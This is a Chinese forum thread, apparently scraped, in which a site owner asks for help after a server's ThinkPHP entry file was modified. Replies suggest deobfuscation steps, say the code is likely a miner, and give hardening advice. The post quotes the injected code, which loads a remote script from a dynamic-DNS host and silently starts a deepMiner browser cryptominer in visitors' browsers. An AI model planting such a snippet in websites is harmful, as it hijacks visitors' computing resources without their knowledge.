【linux】服务器又被入侵
使用 tp5.0 框架的入口文件被人写入不知道啥玩意的东西
求大佬!!!
阿里云服务器
wdlinux 系统
echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script><script>
var uri = 'www';
var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
jqueryui.start();
}
</script>";
回答
1.下载https://greenindex.dynamic-dn...
2.在函数deAES中将返回的字符串输出到控制台中,这些字符串就是真正运行的代码.
3.然后代入他下面写的运行代码,在中间调试.一步步调试 最多半天就能知道他干嘛的了.
貌似挖矿用的
https://github.com/deepwn/dee...
这个是修改PHP后的,
你应找到是哪里注入这一段。建议检查GET,POST
先找一找是哪里出现的漏洞,注入啊!文件包含啊! 然后看一下文件的权限
先修改文件属性,比如说把owner变成root:root
先把日志搂出来审计一遍
最近留意到几次这样的入侵
请问楼主服务器上是否安装了 FTP ?
电脑上使用的 FTP 客户端是?
我怀疑是 FTP 客户端上的后门
如果这代码是入侵者留下的,可以告诉你,你的每一个用户在帮他挖矿。
楼主,我的也中招了!
不是用TP的。
但是也是使用wdcp这个来搭的。
也是直接在我的程序入口处加了你贴出的那段代码。
查也查不到头绪。不知道是从哪里黑进来的。
我觉得问题出在tp或者程序的可能性更大一些。
wdlinux wdcp的重点在控制面板,安全需要自己做。先推荐把php整一整,apache权限,其次是ssh端口,关ftp,防火墙等等。
屏蔽php高危函数
http://www.yunxi365.cn/index....
你是是什么网站系统呀,用什么服务器呀,最近好多人都被入侵了呢。
以上是 【linux】服务器又被入侵 的全部内容, 来源链接: utcz.com/a/85202.html
